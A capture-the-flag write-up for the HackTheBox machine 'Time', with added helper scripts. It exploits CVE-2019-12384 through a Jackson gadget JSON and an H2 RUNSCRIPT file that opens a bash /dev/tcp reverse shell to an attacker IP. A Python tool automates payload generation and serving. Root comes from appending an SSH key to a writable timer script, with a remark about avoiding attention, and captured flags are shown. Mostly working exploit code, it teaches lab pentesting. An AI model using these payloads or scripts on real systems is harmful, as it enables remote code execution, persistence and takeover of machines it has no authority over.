Name | Time |
---|---|
OS | Linux |
Difficulty | Medium |
Base Points | 30 |
Release Date | 24 October 2020 |
IP | 10.10.10.214 |
Starting with an Nmap scan.
sudo nmap -A 10.10.10.214
Results:
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-29 09:52 EST
Nmap scan report for 10.10.10.214
Host is up (0.27s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Online JSON parser
Aggressive OS guesses: Linux 2.6.32 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%), Linux 3.2 - 4.9 (92%), Linux 3.7 - 3.10 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 8888/tcp)
HOP RTT       ADDRESS
1   265.14 ms 10.10.14.1
2   265.21 ms 10.10.10.214

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.11 seconds
Only SSH and a web server are open. The web server hosts an online JSON beautifier and validator. Submitting random data to it produced an error mentioning "fasterxml", which tells me the backend parses user-supplied JSON with Jackson (com.fasterxml.jackson).
Searching for that led to CVE-2019-12384, a jackson-databind flaw in polymorphic type handling: when default typing is enabled, a JSON array whose first element names a class lets the client instantiate ch.qos.logback.core.db.DriverManagerConnectionSource, and its url property is passed straight to JDBC. With H2 on the classpath, an in-memory H2 URL carrying INIT=RUNSCRIPT FROM makes the target download and execute attacker-supplied SQL. I also found a related article here.
Following that article, I wrote the H2 script below and saved it as inject.sql. It defines a Java alias that runs a command through bash, then calls it with a reverse shell back to my listener.
-- H2 compiles the Java source between the $$ markers when the alias is created
-- and runs it inside the target JVM, so SHELLEXEC executes as the web application user.
CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
    String[] command = {"bash", "-c", cmd};
    java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
    return s.hasNext() ? s.next() : "";
} $$;
-- setsid detaches the shell from the request thread; the trailing & lets RUNSCRIPT return.
CALL SHELLEXEC('setsid bash -i &>/dev/tcp/10.10.14.145/1234 0>&1 &');
The target has to fetch this script itself, so I served it from the directory holding inject.sql with Python's http.server module (python3 -m http.server, port 8000) and submitted the following input to the JSON validator. The first array element is the class Jackson instantiates; the url value is the JDBC URL that logback hands to H2, whose INIT clause downloads and runs the script.
["ch.qos.logback.core.db.DriverManagerConnectionSource",{"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://10.10.14.145:8000/inject.sql'"}]
As soon as I submitted it, my listener caught a reverse shell as pericles, the user the web application runs as, and user.txt was in that user's home directory.
kali@kali:~/HackTheBox/Time$ nc -lvp 1234
listening on [any] 1234 ...
10.10.10.214: inverse host lookup failed: Unknown host
connected to [10.10.14.145] from (UNKNOWN) [10.10.10.214] 39670
bash: cannot set terminal process group (-1): Inappropriate ioctl for device.
bash: no job control in this shell
pericles@time:/var/www/html$ cd /home/pericles
cd /home/pericles
pericles@time:/home/pericles$ cat user.txt
cat user.txt
eea96292c498dcf0b90259600334f49a
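To make the steps above repeatable, here is an added helper script; it is not part of the original writeup, it is my own reconstruction of the procedure. It generates inject.sql from an attacker-chosen LHOST/LPORT (escaping the command for H2's single-quoted literal), builds the exact Jackson gadget JSON shown above with a JSON encoder rather than by hand, and serves the SQL the same way python3 -m http.server does. The file name inject.sql and port 8000 come from the writeup; the working directory "www" and the argument order are my assumptions. Starting the nc listener and pasting the JSON into the validator are still done manually.

```python
"""Generate and serve the CVE-2019-12384 payload used in this writeup.

Added example, not the original author's script. It reproduces the two
artefacts from the text: inject.sql (an H2 RUNSCRIPT that defines a Java
alias wrapping bash and calls it with a reverse shell) and the Jackson
gadget JSON that makes the target fetch it.
"""
import functools
import http.server
import json
import sys
from pathlib import Path

# H2 compiles the Java source between the $$ markers when the alias is created
# and runs it inside the target JVM, so SHELLEXEC runs as the web app user.
H2_ALIAS = r"""CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
    String[] command = {"bash", "-c", cmd};
    java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
    return s.hasNext() ? s.next() : "";
} $$;"""

# logback-core class that jackson-databind < 2.9.9.1 failed to blocklist.
GADGET_CLASS = "ch.qos.logback.core.db.DriverManagerConnectionSource"


def reverse_shell_cmd(lhost: str, lport: int) -> str:
    """bash reverse shell. setsid detaches it from the request thread so it
    survives the HTTP response; the trailing & lets RUNSCRIPT return."""
    return f"setsid bash -i &>/dev/tcp/{lhost}/{lport} 0>&1 &"


def build_inject_sql(cmd: str) -> str:
    """inject.sql: the alias plus one CALL. The command sits inside an H2
    single-quoted string literal, so any ' in it has to be doubled."""
    escaped = cmd.replace("'", "''")
    return f"{H2_ALIAS}\nCALL SHELLEXEC('{escaped}');\n"


def build_gadget_json(script_url: str) -> str:
    """The JSON to submit to the validator. With default typing on, Jackson
    instantiates the class named in the first element and sets its 'url'
    property; logback hands that JDBC URL to H2, and INIT=RUNSCRIPT fetches
    and executes the remote SQL as soon as the connection is opened."""
    jdbc_url = ("jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;"
                f"INIT=RUNSCRIPT FROM '{script_url}'")
    return json.dumps([GADGET_CLASS, {"url": jdbc_url}], separators=(",", ":"))


def make_server(directory: Path, port: int) -> http.server.HTTPServer:
    """Equivalent of `python3 -m http.server <port>` run from `directory`."""
    handler = functools.partial(http.server.SimpleHTTPRequestHandler,
                                directory=str(directory))
    return http.server.HTTPServer(("0.0.0.0", port), handler)


if __name__ == "__main__":
    if len(sys.argv) != 3:
        sys.exit(f"usage: {sys.argv[0]} LHOST LPORT   (e.g. 10.10.14.145 1234)")
    lhost, lport, http_port = sys.argv[1], int(sys.argv[2]), 8000
    workdir = Path("www")  # assumed working directory, served over HTTP
    workdir.mkdir(exist_ok=True)
    (workdir / "inject.sql").write_text(build_inject_sql(reverse_shell_cmd(lhost, lport)))
    print(f"1. start the listener:  nc -lvp {lport}")
    print("2. paste this into the JSON validator:")
    print(build_gadget_json(f"http://{lhost}:{http_port}/inject.sql"))
    with make_server(workdir, http_port) as httpd:
        print(f"3. serving {workdir}/inject.sql on port {http_port}, Ctrl-C to stop")
        httpd.serve_forever()
```

Run it as `python3 payload.py 10.10.14.145 1234`, start the listener, then paste the printed JSON into the validator. Building the JSON with json.dumps matters because the single quotes around the URL must survive unescaped inside a JSON string; the output is byte-for-byte the payload shown above.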
Enumerating with linPEAS showed that the script /usr/bin/timer_backup.sh is writable by pericles. The name points to a script run from a systemd timer, and the root login below confirms it executes as root, so anything appended to it runs with root privileges the next time the timer fires. Before relying on that, it is worth confirming the permissions with ls -l and finding the unit that runs it (systemctl list-timers --all, or grep for the script path under /etc/systemd/system).
I appended a line that adds my own public key to root's authorized_keys, waited for the timer to run, and then logged in over SSH with the matching private key.
pericles@time:/usr/bin$ echo "echo ssh-rsa <key data from ~/.ssh/id_rsa.pub> >> /root/.ssh/authorized_keys" >> /usr/bin/timer_backup.sh
Once the timer has run the modified script, I can log in as root with:
kali@kali:/HackTheBox/Time$ ssh -i ~/.ssh/id_rsa root@10.10.10.214
...
root@time:~# whoami
root
root@time:~# cat root.txt
d8815bebb94ab95b5e3d4f3370dba11e
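linPEAS only reports that the script is writable; before appending a payload to a file like /usr/bin/timer_backup.sh I want to know which systemd service or cron entry actually invokes it and as which user, since a script nobody runs (or that runs as www-data) gives nothing. The following is an added example of that check, not something from the original writeup or from linPEAS. It scans the standard systemd unit and cron locations for an Exec*= line or a cron entry naming the script and reports the User= (no User= means root) and any matching .timer. The unit and cron directories are the usual defaults and are parameters; demo() builds a constructed unit tree in a temp directory so the logic can be exercised offline, and its unit contents are made up, not the real box's.

```python
"""Confirm a writable script is really executed by root before editing it.

Added example for this writeup, not the author's code. The unit and cron
locations are parameters so the checks can run against a constructed tree.
"""
import os
import re
import sys
import tempfile
from pathlib import Path

SYSTEMD_DIRS = ["/etc/systemd/system", "/lib/systemd/system", "/usr/lib/systemd/system"]
CRON_PATHS = ["/etc/crontab", "/etc/cron.d", "/var/spool/cron/crontabs"]


def writable_by_me(path: str) -> bool:
    """True if the current user may write the file (what linPEAS flags)."""
    return os.access(path, os.W_OK)


def units_running(script: str, unit_dirs=SYSTEMD_DIRS) -> list:
    """[(service_path, user)] for .service files whose Exec*= line names the
    script. A service without User= runs as root."""
    hits = []
    pattern = re.compile(r"^Exec\w*=.*" + re.escape(script), re.M)
    for d in unit_dirs:
        if not os.path.isdir(d):
            continue
        for unit in sorted(Path(d).glob("*.service")):
            try:
                text = unit.read_text(errors="replace")
            except OSError:
                continue
            if pattern.search(text):
                user = re.search(r"^User=(\S+)", text, re.M)
                hits.append((str(unit), user.group(1) if user else "root"))
    return hits


def timer_for(service_path: str):
    """Path of the .timer that activates this service, if one sits beside it."""
    timer = Path(service_path).with_suffix(".timer")
    return str(timer) if timer.is_file() else None


def cron_references(script: str, cron_paths=CRON_PATHS) -> list:
    """Files in the cron locations that mention the script."""
    hits = []
    for p in cron_paths:
        try:
            files = list(Path(p).iterdir()) if os.path.isdir(p) else [Path(p)]
            hits += [str(f) for f in files
                     if f.is_file() and script in f.read_text(errors="replace")]
        except OSError:  # e.g. /var/spool/cron/crontabs is root-only
            continue
    return hits


def demo() -> dict:
    """Run the checks against a constructed unit tree (made-up contents)."""
    d = Path(tempfile.mkdtemp())
    (d / "timer_backup.service").write_text(
        "[Unit]\nDescription=constructed example\n\n[Service]\nType=oneshot\n"
        "ExecStart=/bin/bash /usr/bin/timer_backup.sh\n")
    (d / "timer_backup.timer").write_text(
        "[Timer]\nOnUnitActiveSec=10s\n\n[Install]\nWantedBy=timers.target\n")
    (d / "other.service").write_text(
        "[Service]\nUser=www-data\nExecStart=/usr/bin/other.sh\n")
    hits = units_running("/usr/bin/timer_backup.sh", [str(d)])
    return {"hits": hits, "timer": timer_for(hits[0][0]) if hits else None}


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "/usr/bin/timer_backup.sh"
    print(f"{target}: writable by me = {writable_by_me(target)}")
    for svc, user in units_running(target):
        print(f"  run by {svc} as {user}, timer: {timer_for(svc)}")
    for f in cron_references(target):
        print(f"  referenced by cron file {f}")
```

Run on the target as pericles with `python3 check.py /usr/bin/timer_backup.sh`; a hit with user root and a sibling .timer is the confirmation that an appended line will execute as root on the next activation. Appending with `>>`, as in the writeup, keeps the script's original behaviour intact so the timer does not start failing and drawing attention.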